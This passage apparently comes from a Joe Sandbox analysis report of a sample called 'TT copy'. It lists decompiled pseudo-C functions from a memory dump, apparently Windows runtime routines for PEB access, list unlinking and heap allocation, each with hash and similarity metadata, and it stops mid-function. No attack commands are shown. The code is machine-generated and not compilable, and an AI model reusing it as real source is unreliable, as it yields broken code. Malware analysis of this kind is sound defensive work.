                                                                                                            • Instruction Fuzzy Hash: ED213931151642DFC766FF68CA40F99B7F9FF18708F14456CE09986AA2CB34E941CB44
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 90%
                                                                                                            			E010F4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                                                                                            				intOrPtr* _t18;
                                                                                                            				intOrPtr _t24;
                                                                                                            				intOrPtr* _t27;
                                                                                                            				intOrPtr* _t30;
                                                                                                            				intOrPtr* _t31;
                                                                                                            				intOrPtr _t33;
                                                                                                            				intOrPtr* _t34;
                                                                                                            				intOrPtr* _t35;
                                                                                                            				void* _t37;
                                                                                                            				void* _t38;
                                                                                                            				void* _t39;
                                                                                                            				void* _t43;
                                                                                                            
                                                                                                            				_t39 = __eflags;
                                                                                                            				_t35 = __edi;
                                                                                                            				_push(8);
                                                                                                            				_push(0x11408d0);
                                                                                                            				E010BD08C(__ebx, __edi, __esi);
                                                                                                            				_t37 = __ecx;
                                                                                                            				E010F41E8(__ebx, __edi, __ecx, _t39);
                                                                                                            				E0107EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                            				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                                                                                                            				_t18 = _t37 + 8;
                                                                                                            				_t33 =  *_t18;
                                                                                                            				_t27 =  *((intOrPtr*)(_t18 + 4));
                                                                                                            				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                                                                                                            					L8:
                                                                                                            					_push(3);
                                                                                                            					asm("int 0x29");
                                                                                                            				} else {
                                                                                                            					 *_t27 = _t33;
                                                                                                            					 *((intOrPtr*)(_t33 + 4)) = _t27;
                                                                                                            					_t35 = 0x11587e4;
                                                                                                            					_t18 =  *0x11587e0; // 0x0
                                                                                                            					while(_t18 != 0) {
                                                                                                            						_t43 = _t18 -  *0x1155cd0; // 0xffffffff
                                                                                                            						if(_t43 >= 0) {
                                                                                                            							_t31 =  *0x11587e4; // 0x0
                                                                                                            							_t18 =  *_t31;
                                                                                                            							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                                                                                                            								goto L8;
                                                                                                            							} else {
                                                                                                            								 *0x11587e4 = _t18;
                                                                                                            								 *((intOrPtr*)(_t18 + 4)) = _t35;
                                                                                                            								L01067055(_t31 + 0xfffffff8);
                                                                                                            								_t24 =  *0x11587e0; // 0x0
                                                                                                            								_t18 = _t24 - 1;
                                                                                                            								 *0x11587e0 = _t18;
                                                                                                            								continue;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						goto L9;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				L9:
                                                                                                            				__eflags =  *0x1155cd0;
                                                                                                            				if( *0x1155cd0 <= 0) {
                                                                                                            					L01067055(_t37);
                                                                                                            				} else {
                                                                                                            					_t30 = _t37 + 8;
                                                                                                            					_t34 =  *0x11587e8; // 0x0
                                                                                                            					__eflags =  *_t34 - _t35;
                                                                                                            					if( *_t34 != _t35) {
                                                                                                            						goto L8;
                                                                                                            					} else {
                                                                                                            						 *_t30 = _t35;
                                                                                                            						 *((intOrPtr*)(_t30 + 4)) = _t34;
                                                                                                            						 *_t34 = _t30;
                                                                                                            						 *0x11587e8 = _t30;
                                                                                                            						 *0x11587e0 = _t18 + 1;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				 *(_t38 - 4) = 0xfffffffe;
                                                                                                            				return E010BD0D1(L010F4320());
                                                                                                            			}
















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 794605df6b006f25fc058405ed2c70d79aaa8b2b91988c2fc63313fa34ba3a20
                                                                                                            • Instruction ID: 16bedf3f728106440804dfd1d0340a4fe5184b4e605120e225123266d3216bc2
                                                                                                            • Opcode Fuzzy Hash: 794605df6b006f25fc058405ed2c70d79aaa8b2b91988c2fc63313fa34ba3a20
                                                                                                            • Instruction Fuzzy Hash: C921AE74900B01CFC7A9DF69D101695BBF1FB45318B9082BED6A5CBA95D731D491CF00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 29%
                                                                                                            			E01092397(intOrPtr _a4) {
                                                                                                            				void* __ebx;
                                                                                                            				void* __ecx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				signed int _t11;
                                                                                                            				void* _t19;
                                                                                                            				void* _t25;
                                                                                                            				void* _t26;
                                                                                                            				intOrPtr _t27;
                                                                                                            				void* _t28;
                                                                                                            				void* _t29;
                                                                                                            
                                                                                                            				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                                                                                                            				if( *0x115848c != 0) {
                                                                                                            					L0108FAD0(0x1158610);
                                                                                                            					if( *0x115848c == 0) {
                                                                                                            						E0108FA00(0x1158610, _t19, _t27, 0x1158610);
                                                                                                            						goto L1;
                                                                                                            					} else {
                                                                                                            						_push(0);
                                                                                                            						_push(_a4);
                                                                                                            						_t26 = 4;
                                                                                                            						_t29 = E01092581(0x1158610, 0x10450a0, _t26, _t27, _t28);
                                                                                                            						E0108FA00(0x1158610, 0x10450a0, _t27, 0x1158610);
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					L1:
                                                                                                            					_t11 =  *0x1158614; // 0x0
                                                                                                            					if(_t11 == 0) {
                                                                                                            						_t11 = E010A4886(0x1041088, 1, 0x1158614);
                                                                                                            					}
                                                                                                            					_push(0);
                                                                                                            					_push(_a4);
                                                                                                            					_t25 = 4;
                                                                                                            					_t29 = E01092581(0x1158610, (_t11 << 4) + 0x1045070, _t25, _t27, _t28);
                                                                                                            				}
                                                                                                            				if(_t29 != 0) {
                                                                                                            					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                                                                                                            					 *((char*)(_t29 + 0x40)) = 0;
                                                                                                            				}
                                                                                                            				return _t29;
                                                                                                            			}

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 11502b5352da62356136a65fb361af45e368a20e75658bbc3803606b7c525304
                                                                                                            • Instruction ID: c3326f3b431cb82d4717704c1fbd263cc4ea25b7ef7250b0fd5b7e7d744376df
                                                                                                            • Opcode Fuzzy Hash: 11502b5352da62356136a65fb361af45e368a20e75658bbc3803606b7c525304
                                                                                                            • Instruction Fuzzy Hash: 32112B71744301B7EB74A63EDC90B59B6D8BBA0660F14C06AFAC2E7180CAB0E840D754
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 93%
                                                                                                            			E010E46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                                                                                                            				signed short* _v8;
                                                                                                            				unsigned int _v12;
                                                                                                            				intOrPtr _v16;
                                                                                                            				signed int _t22;
                                                                                                            				signed char _t23;
                                                                                                            				short _t32;
                                                                                                            				void* _t38;
                                                                                                            				char* _t40;
                                                                                                            
                                                                                                            				_v12 = __edx;
                                                                                                            				_t29 = 0;
                                                                                                            				_v8 = __ecx;
                                                                                                            				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                                                                                                            				_t38 = L01084620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                                                                                                            				if(_t38 != 0) {
                                                                                                            					_t40 = _a4;
                                                                                                            					 *_t40 = 1;
                                                                                                            					E010AF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                                                                                                            					_t22 = _v12 >> 1;
                                                                                                            					_t32 = 0x2e;
                                                                                                            					 *((short*)(_t38 + _t22 * 2)) = _t32;
                                                                                                            					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                                                                                                            					_t23 = E0109D268(_t38, 1);
                                                                                                            					asm("sbb al, al");
                                                                                                            					 *_t40 =  ~_t23 + 1;
                                                                                                            					L010877F0(_v16, 0, _t38);
                                                                                                            				} else {
                                                                                                            					 *_a4 = 0;
                                                                                                            					_t29 = 0xc0000017;
                                                                                                            				}
                                                                                                            				return _t29;
                                                                                                            			}

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                            • Instruction ID: b32f66d99c1aaf30e0e2e827027c598e283c00904ff121d3dc59f7a87f88dfbb
                                                                                                            • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                            • Instruction Fuzzy Hash: 63110272504208BFCB01AF5DD8808BEBBB9EF99304F1080AAF984C7350DA318D51D7A5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 42%
                                                                                                            			E0106C962(char __ecx) {
                                                                                                            				signed int _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				intOrPtr _t19;
                                                                                                            				char _t22;
                                                                                                            				intOrPtr _t26;
                                                                                                            				intOrPtr _t27;
                                                                                                            				char _t32;
                                                                                                            				char _t34;
                                                                                                            				intOrPtr _t35;
                                                                                                            				intOrPtr _t37;
                                                                                                            				intOrPtr* _t38;
                                                                                                            				signed int _t39;
                                                                                                            
                                                                                                            				_t41 = (_t39 & 0xfffffff8) - 0xc;
                                                                                                            				_v8 =  *0x115d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                                                                                                            				_t34 = __ecx;
                                                                                                            				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                                                                                                            					_t26 = 0;
                                                                                                            					E0107EEF0(0x11570a0);
                                                                                                            					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                                                                                                            					if(E010EF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                                                                                                            						L9:
                                                                                                            						E0107EB70(_t29, 0x11570a0);
                                                                                                            						_t19 = _t26;
                                                                                                            						L2:
                                                                                                            						_pop(_t35);
                                                                                                            						_pop(_t37);
                                                                                                            						_pop(_t27);
                                                                                                            						return E010AB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                                                                                                            					}
                                                                                                            					_t29 = _t34;
                                                                                                            					_t26 = E010EF1FC(_t34, _t32);
                                                                                                            					if(_t26 < 0) {
                                                                                                            						goto L9;
                                                                                                            					}
                                                                                                            					_t38 =  *0x11570c0; // 0x0
                                                                                                            					while(_t38 != 0x11570c0) {
                                                                                                            						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                                                                                                            						_t38 =  *_t38;
                                                                                                            						_v12 = _t22;
                                                                                                            						if(_t22 != 0) {
                                                                                                            							_t29 = _t22;
                                                                                                            							 *0x115b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                                                                                                            							_v12();
                                                                                                            						}
                                                                                                            					}
                                                                                                            					goto L9;
                                                                                                            				}
                                                                                                            				_t19 = 0;
                                                                                                            				goto L2;
                                                                                                            			}


















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5b250a3294cbf3db146a35fd78fc8f914de5b234ec697f327505a278879a9f02
                                                                                                            • Instruction ID: a997f4d2c1eb0e55ad7e37874b7ad4e49a5ce56be696fb509dbb0026e61b4ead
                                                                                                            • Opcode Fuzzy Hash: 5b250a3294cbf3db146a35fd78fc8f914de5b234ec697f327505a278879a9f02
                                                                                                            • Instruction Fuzzy Hash: C411023130070A9FC7A4AE29DC85A6BBBE5BF84218B40057CF9D583691DB20EC40CBD1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 87%
                                                                                                            			E010A37F5(void* __ecx, intOrPtr* __edx) {
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				signed char _t6;
                                                                                                            				intOrPtr _t13;
                                                                                                            				intOrPtr* _t20;
                                                                                                            				intOrPtr* _t27;
                                                                                                            				void* _t28;
                                                                                                            				intOrPtr* _t29;
                                                                                                            
                                                                                                            				_t27 = __edx;
                                                                                                            				_t28 = __ecx;
                                                                                                            				if(__edx == 0) {
                                                                                                            					E01082280(_t6, 0x1158550);
                                                                                                            				}
                                                                                                            				_t29 = E010A387E(_t28);
                                                                                                            				if(_t29 == 0) {
                                                                                                            					L6:
                                                                                                            					if(_t27 == 0) {
                                                                                                            						E0107FFB0(0x1158550, _t27, 0x1158550);
                                                                                                            					}
                                                                                                            					if(_t29 == 0) {
                                                                                                            						return 0xc0000225;
                                                                                                            					} else {
                                                                                                            						if(_t27 != 0) {
                                                                                                            							goto L14;
                                                                                                            						}
                                                                                                            						L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                                                                                                            						goto L11;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t13 =  *_t29;
                                                                                                            					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                                                                                                            						L13:
                                                                                                            						_push(3);
                                                                                                            						asm("int 0x29");
                                                                                                            						L14:
                                                                                                            						 *_t27 = _t29;
                                                                                                            						L11:
                                                                                                            						return 0;
                                                                                                            					}
                                                                                                            					_t20 =  *((intOrPtr*)(_t29 + 4));
                                                                                                            					if( *_t20 != _t29) {
                                                                                                            						goto L13;
                                                                                                            					}
                                                                                                            					 *_t20 = _t13;
                                                                                                            					 *((intOrPtr*)(_t13 + 4)) = _t20;
                                                                                                            					asm("btr eax, ecx");
                                                                                                            					goto L6;
                                                                                                            				}
                                                                                                            			}











                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 438b9bbee5e88525bcf8797851aa52cfc51b33596e7d3276bcb01242aa8f7412
                                                                                                            • Instruction ID: 352e031c79360c579765eb999d32f72bfd7443ba65011dcd72a464fd8f6f9917
                                                                                                            • Opcode Fuzzy Hash: 438b9bbee5e88525bcf8797851aa52cfc51b33596e7d3276bcb01242aa8f7412
                                                                                                            • Instruction Fuzzy Hash: EB0126B29027119BC3779B9ED900E2ABBE6FF81A6075540A9E9C58F205CB30C800C7C0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0109002D() {
                                                                                                            				void* _t11;
                                                                                                            				char* _t14;
                                                                                                            				signed char* _t16;
                                                                                                            				char* _t27;
                                                                                                            				signed char* _t29;
                                                                                                            
                                                                                                            				_t11 = E01087D50();
                                                                                                            				_t27 = 0x7ffe0384;
                                                                                                            				if(_t11 != 0) {
                                                                                                            					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                            				} else {
                                                                                                            					_t14 = 0x7ffe0384;
                                                                                                            				}
                                                                                                            				_t29 = 0x7ffe0385;
                                                                                                            				if( *_t14 != 0) {
                                                                                                            					if(E01087D50() == 0) {
                                                                                                            						_t16 = 0x7ffe0385;
                                                                                                            					} else {
                                                                                                            						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                            					}
                                                                                                            					if(( *_t16 & 0x00000040) != 0) {
                                                                                                            						goto L18;
                                                                                                            					} else {
                                                                                                            						goto L3;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					L3:
                                                                                                            					if(E01087D50() != 0) {
                                                                                                            						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                            					}
                                                                                                            					if( *_t27 != 0) {
                                                                                                            						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                                                                                                            							goto L5;
                                                                                                            						}
                                                                                                            						if(E01087D50() != 0) {
                                                                                                            							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                            						}
                                                                                                            						if(( *_t29 & 0x00000020) == 0) {
                                                                                                            							goto L5;
                                                                                                            						}
                                                                                                            						L18:
                                                                                                            						return 1;
                                                                                                            					} else {
                                                                                                            						L5:
                                                                                                            						return 0;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}








                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                                            • Instruction ID: 562d6f56d89762546f43e622472e7a0786e69fb2fb5c1f5f9bcb995a43647093
                                                                                                            • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                                            • Instruction Fuzzy Hash: 2911C232205781CFEB62AB28C954B3937E8AB91764F1900E0FDD4C7A96D339D841C750
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 94%
                                                                                                            			E0107766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                                                                            				char _v8;
                                                                                                            				void* _t22;
                                                                                                            				void* _t24;
                                                                                                            				intOrPtr _t29;
                                                                                                            				intOrPtr* _t30;
                                                                                                            				void* _t42;
                                                                                                            				intOrPtr _t47;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_t36 =  &_v8;
                                                                                                            				if(E0109F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                                                                                                            					L10:
                                                                                                            					_t22 = 0;
                                                                                                            				} else {
                                                                                                            					_t24 = _v8 + __ecx;
                                                                                                            					_t42 = _t24;
                                                                                                            					if(_t24 < __ecx) {
                                                                                                            						goto L10;
                                                                                                            					} else {
                                                                                                            						if(E0109F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                                                                                                            							goto L10;
                                                                                                            						} else {
                                                                                                            							_t29 = _v8 + _t42;
                                                                                                            							if(_t29 < _t42) {
                                                                                                            								goto L10;
                                                                                                            							} else {
                                                                                                            								_t47 = _t29;
                                                                                                            								_t30 = _a16;
                                                                                                            								if(_t30 != 0) {
                                                                                                            									 *_t30 = _t47;
                                                                                                            								}
                                                                                                            								if(_t47 == 0) {
                                                                                                            									goto L10;
                                                                                                            								} else {
                                                                                                            									_t22 = L01084620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t22;
                                                                                                            			}











                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                            • Instruction ID: 39e666a7da414dbee33df42921a089aaf507c0f36234626bd7a6be6819a54088
                                                                                                            • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                            • Instruction Fuzzy Hash: 1601AC72B00119ABDB30DE5ECC55E9B7BEDEB886A0F244564BA48CB254DA30DD01C7A4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 69%
                                                                                                            			E01069080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                                                                            				intOrPtr* _t51;
                                                                                                            				intOrPtr _t59;
                                                                                                            				signed int _t64;
                                                                                                            				signed int _t67;
                                                                                                            				signed int* _t71;
                                                                                                            				signed int _t74;
                                                                                                            				signed int _t77;
                                                                                                            				signed int _t82;
                                                                                                            				intOrPtr* _t84;
                                                                                                            				void* _t85;
                                                                                                            				intOrPtr* _t87;
                                                                                                            				void* _t94;
                                                                                                            				signed int _t95;
                                                                                                            				intOrPtr* _t97;
                                                                                                            				signed int _t99;
                                                                                                            				signed int _t102;
                                                                                                            				void* _t104;
                                                                                                            
                                                                                                            				_push(__ebx);
                                                                                                            				_push(__esi);
                                                                                                            				_push(__edi);
                                                                                                            				_t97 = __ecx;
                                                                                                            				_t102 =  *(__ecx + 0x14);
                                                                                                            				if((_t102 & 0x02ffffff) == 0x2000000) {
                                                                                                            					_t102 = _t102 | 0x000007d0;
                                                                                                            				}
                                                                                                            				_t48 =  *[fs:0x30];
                                                                                                            				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                                                                            					_t102 = _t102 & 0xff000000;
                                                                                                            				}
                                                                                                            				_t80 = 0x11585ec;
                                                                                                            				E01082280(_t48, 0x11585ec);
                                                                                                            				_t51 =  *_t97 + 8;
                                                                                                            				if( *_t51 != 0) {
                                                                                                            					L6:
                                                                                                            					return E0107FFB0(_t80, _t97, _t80);
                                                                                                            				} else {
                                                                                                            					 *(_t97 + 0x14) = _t102;
                                                                                                            					_t84 =  *0x115538c; // 0x77496828
                                                                                                            					if( *_t84 != 0x1155388) {
                                                                                                            						_t85 = 3;
                                                                                                            						asm("int 0x29");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						_push(0x2c);
                                                                                                            						_push(0x113f6e8);
                                                                                                            						E010BD0E8(0x11585ec, _t97, _t102);
                                                                                                            						 *((char*)(_t104 - 0x1d)) = 0;
                                                                                                            						_t99 =  *(_t104 + 8);
                                                                                                            						__eflags = _t99;
                                                                                                            						if(_t99 == 0) {
                                                                                                            							L13:
                                                                                                            							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                                                                            							if(__eflags == 0) {
                                                                                                            								E011388F5(_t80, _t85, 0x1155388, _t99, _t102, __eflags);
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							__eflags = _t99 -  *0x11586c0; // 0xc007b0
                                                                                                            							if(__eflags == 0) {
                                                                                                            								goto L13;
                                                                                                            							} else {
                                                                                                            								__eflags = _t99 -  *0x11586b8; // 0x0
                                                                                                            								if(__eflags == 0) {
                                                                                                            									goto L13;
                                                                                                            								} else {
                                                                                                            									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                                                                                            									__eflags =  *((char*)(_t59 + 0x28));
                                                                                                            									if( *((char*)(_t59 + 0x28)) == 0) {
                                                                                                            										E01082280(_t99 + 0xe0, _t99 + 0xe0);
                                                                                                            										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                                                                                                            										__eflags =  *((char*)(_t99 + 0xe5));
                                                                                                            										if(__eflags != 0) {
                                                                                                            											E011388F5(0x11585ec, _t85, 0x1155388, _t99, _t102, __eflags);
                                                                                                            										} else {
                                                                                                            											__eflags =  *((char*)(_t99 + 0xe4));
                                                                                                            											if( *((char*)(_t99 + 0xe4)) == 0) {
                                                                                                            												 *((char*)(_t99 + 0xe4)) = 1;
                                                                                                            												_push(_t99);
                                                                                                            												_push( *((intOrPtr*)(_t99 + 0x24)));
                                                                                                            												E010AAFD0();
                                                                                                            											}
                                                                                                            											while(1) {
                                                                                                            												_t71 = _t99 + 8;
                                                                                                            												 *(_t104 - 0x2c) = _t71;
                                                                                                            												_t80 =  *_t71;
                                                                                                            												_t95 = _t71[1];
                                                                                                            												 *(_t104 - 0x28) = _t80;
                                                                                                            												 *(_t104 - 0x24) = _t95;
                                                                                                            												while(1) {
                                                                                                            													L19:
                                                                                                            													__eflags = _t95;
                                                                                                            													if(_t95 == 0) {
                                                                                                            														break;
                                                                                                            													}
                                                                                                            													_t102 = _t80;
                                                                                                            													 *(_t104 - 0x30) = _t95;
                                                                                                            													 *(_t104 - 0x24) = _t95 - 1;
                                                                                                            													asm("lock cmpxchg8b [edi]");
                                                                                                            													_t80 = _t102;
                                                                                                            													 *(_t104 - 0x28) = _t80;
                                                                                                            													 *(_t104 - 0x24) = _t95;
                                                                                                            													__eflags = _t80 - _t102;
                                                                                                            													_t99 =  *(_t104 + 8);
                                                                                                            													if(_t80 != _t102) {
                                                                                                            														continue;
                                                                                                            													} else {
                                                                                                            														__eflags = _t95 -  *(_t104 - 0x30);
                                                                                                            														if(_t95 !=  *(_t104 - 0x30)) {
                                                                                                            															continue;
                                                                                                            														} else {
                                                                                                            															__eflags = _t95;
                                                                                                            															if(_t95 != 0) {
                                                                                                            																_t74 = 0;
                                                                                                            																 *(_t104 - 0x34) = 0;
                                                                                                            																_t102 = 0;
                                                                                                            																__eflags = 0;
                                                                                                            																while(1) {
                                                                                                            																	 *(_t104 - 0x3c) = _t102;
                                                                                                            																	__eflags = _t102 - 3;
                                                                                                            																	if(_t102 >= 3) {
                                                                                                            																		break;
                                                                                                            																	}
                                                                                                            																	__eflags = _t74;
                                                                                                            																	if(_t74 != 0) {
                                                                                                            																		L49:
                                                                                                            																		_t102 =  *_t74;
                                                                                                            																		__eflags = _t102;
                                                                                                            																		if(_t102 != 0) {
                                                                                                            																			_t102 =  *(_t102 + 4);
                                                                                                            																			__eflags = _t102;
                                                                                                            																			if(_t102 != 0) {
                                                                                                            																				 *0x115b1e0(_t74, _t99);
                                                                                                            																				 *_t102();
                                                                                                            																			}
                                                                                                            																		}
                                                                                                            																		do {
                                                                                                            																			_t71 = _t99 + 8;
                                                                                                            																			 *(_t104 - 0x2c) = _t71;
                                                                                                            																			_t80 =  *_t71;
                                                                                                            																			_t95 = _t71[1];
                                                                                                            																			 *(_t104 - 0x28) = _t80;
                                                                                                            																			 *(_t104 - 0x24) = _t95;
                                                                                                            																			goto L19;
                                                                                                            																		} while (_t74 == 0);
                                                                                                            																		goto L49;
                                                                                                            																	} else {
                                                                                                            																		_t82 = 0;
                                                                                                            																		__eflags = 0;
                                                                                                            																		while(1) {
                                                                                                            																			 *(_t104 - 0x38) = _t82;
                                                                                                            																			__eflags = _t82 -  *0x11584c0;
                                                                                                            																			if(_t82 >=  *0x11584c0) {
                                                                                                            																				break;
                                                                                                            																			}
                                                                                                            																			__eflags = _t74;
                                                                                                            																			if(_t74 == 0) {
                                                                                                            																				_t77 = E01139063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                                                                                            																				__eflags = _t77;
                                                                                                            																				if(_t77 == 0) {
                                                                                                            																					_t74 = 0;
                                                                                                            																					__eflags = 0;
                                                                                                            																				} else {
                                                                                                            																					_t74 = _t77 + 0xfffffff4;
                                                                                                            																				}
                                                                                                            																				 *(_t104 - 0x34) = _t74;
                                                                                                            																				_t82 = _t82 + 1;
                                                                                                            																				continue;
                                                                                                            																			}
                                                                                                            																			break;
                                                                                                            																		}
                                                                                                            																		_t102 = _t102 + 1;
                                                                                                            																		continue;
                                                                                                            																	}
                                                                                                            																	goto L20;
                                                                                                            																}
                                                                                                            																__eflags = _t74;
                                                                                                            															}
                                                                                                            														}
                                                                                                            													}
                                                                                                            													break;
                                                                                                            												}
                                                                                                            												L20:
                                                                                                            												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                                                                                                            												 *((char*)(_t99 + 0xe5)) = 1;
                                                                                                            												 *((char*)(_t104 - 0x1d)) = 1;
                                                                                                            												goto L21;
                                                                                                            											}
                                                                                                            										}
                                                                                                            										L21:
                                                                                                            										 *(_t104 - 4) = 0xfffffffe;
                                                                                                            										E0106922A(_t99);
                                                                                                            										_t64 = E01087D50();
